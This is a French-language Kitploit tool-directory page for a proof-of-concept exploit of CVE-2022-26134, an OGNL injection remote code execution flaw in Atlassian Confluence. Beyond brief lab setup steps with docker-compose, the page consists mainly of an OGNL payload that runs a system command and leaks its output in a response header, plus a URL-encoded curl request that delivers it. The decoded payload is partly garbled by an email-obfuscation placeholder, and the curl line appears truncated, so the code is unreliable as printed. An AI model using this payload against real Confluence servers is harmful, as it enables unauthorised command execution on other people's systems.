Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/coldfusionx/cve-2022-26134
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubcoldfusionx/cve-2022-26134

CVE-2022-26134

Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)

Voir le dépôt
22il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC - Injection OGNL dans Atlassian Confluence Conduisant à une Exécution de Code à Distance (RCE) (CVE-2022-26134)

Testé sur Confluence version 7.13.6

Configuration de l'environnement

  • Clonez le dépôt
root@kitploit:~
docker-compose up -d 
  • Sur http://localhost:8090, vous verrez Confluence opérationnel.

  • Ensuite, obtenez une licence d'évaluation pour Confluence et configurez la base de données avec le nom de base de données confluence, l'utilisateur postgres et le mot de passe root.

Exploit

  • Charge utile décodée
root@kitploit:~
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
  • Requête Curl
root@kitploit:~
curl -v "http://localhost:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%
  • POC poc
Télécharger l’outil